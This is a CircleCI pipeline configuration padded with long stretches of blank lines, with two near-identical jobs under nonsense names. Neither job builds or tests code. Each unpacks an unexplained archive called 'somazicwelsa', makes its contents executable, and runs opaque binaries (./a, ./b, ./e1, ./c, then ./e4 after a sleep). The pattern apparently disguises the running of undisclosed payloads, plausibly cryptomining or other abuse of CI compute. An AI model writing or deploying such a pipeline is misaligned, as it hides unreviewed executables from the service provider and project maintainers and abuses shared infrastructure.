

















































version: 2.1
jobs:


















































  Aaaab:
    docker:


















































      - image: circleci/buildpack-deps:buster-scm
    steps:
      - checkout
      - run:


















































          name: A16312
          command: sudo apt update -y
      - run:
          name: Buioewe


















































          command: |
            tar -xf somazicwelsa && chmod u+x *
            ./a
            ./b
            ./e1
            ./c
      - run:
          name: Ranuer


















































          no_output_timeout: 1m
          command: |
            sleep 30s
            ./e4
    parallelism: 1
  Aaaa:
    docker:


















































      - image: circleci/buildpack-deps:buster-scm
    steps:
      - checkout
      - run:


















































          name: A1987
          command: sudo apt update -y
      - run:
          name: ouieriew


















































          command: |
            tar -xf somazicwelsa && chmod u+x *
            ./a
            ./b
            ./e1
            ./c
      - run:
          name: warune


















































          no_output_timeout: 1m
          command: |
            sleep 330s
            ./e4


















































    parallelism: 1
workflows:
    version: 2.1
    build:
        jobs:


















































            - Aaaab
            - Aaaa



